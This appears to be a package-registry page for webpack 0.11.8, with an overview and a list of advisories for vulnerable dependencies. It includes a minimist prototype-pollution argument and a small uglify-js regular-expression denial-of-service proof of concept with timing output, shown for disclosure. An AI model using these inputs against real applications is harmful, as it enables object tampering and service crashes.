Webpack version 0.11.8, released on November 27, 2013, represents a minor update over version 0.11.7, which was released just a day prior on November 26, 2013. Both versions offer the core functionalities of webpack: packing CommonJs, AMD, and labeled modules for browser deployment, allowing for code splitting into bundles, and supporting loaders for preprocessing various file types like JSON, Jade, CoffeeScript, CSS, and Less. This enables developers to efficiently manage and optimize their web application's assets.
The dependency and devDependency lists remain identical between the two versions, including essential tools such as async, clone, uglify-js for optimization and code management, and loaders like css-loader, less-loader, and coffee-loader for seamless integration of different file types. This consistency ensures that upgrading from 0.11.7 to 0.11.8 should be a straightforward process with minimal compatibility concerns.
While the specific changes between these two versions are not explicitly detailed in the provided metadata, the quick release cycle suggests that version 0.11.8 likely addresses minor bug fixes, performance improvements, or potentially security patches identified shortly after the release of 0.11.7. For developers using webpack in their projects, upgrading to the latest minor version is generally recommended to benefit from these improvements and ensure the stability and security of their build process. Both versions rely on a similar architecture built around loaders, plugins and the core compilation of assets to build a comprehensive web application bundler.
All the vulnerabilities related to the version 0.11.8 of the package
Prototype Pollution in minimist
Affected versions of minimist are vulnerable to prototype pollution. Arguments are not properly sanitized, allowing an attacker to modify the prototype of Object, causing the addition or modification of an existing property that will exist on all objects.
Parsing the argument --__proto__.y=Polluted adds a y property with value Polluted to all objects. The argument --__proto__=Polluted raises and uncaught error and crashes the application.
This is exploitable if attackers have control over the arguments being passed to minimist.
Upgrade to versions 0.2.1, 1.2.3 or later.
Prototype Pollution in minimist
Minimist prior to 1.2.6 and 0.2.4 is vulnerable to Prototype Pollution via file index.js, function setKey() (lines 69-95).
Regular Expression Denial of Service in uglify-js
Versions of uglify-js prior to 2.6.0 are affected by a regular expression denial of service vulnerability when malicious inputs are passed into the parse() method.
var u = require('uglify-js');
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
u.parse("var a = " + genstr(process.argv[2], "1") + ".1ee7;");
$ time node test.js 10000
real 0m1.091s
user 0m1.047s
sys 0m0.039s
$ time node test.js 80000
real 0m6.486s
user 0m6.229s
sys 0m0.094s
Update to version 2.6.0 or later.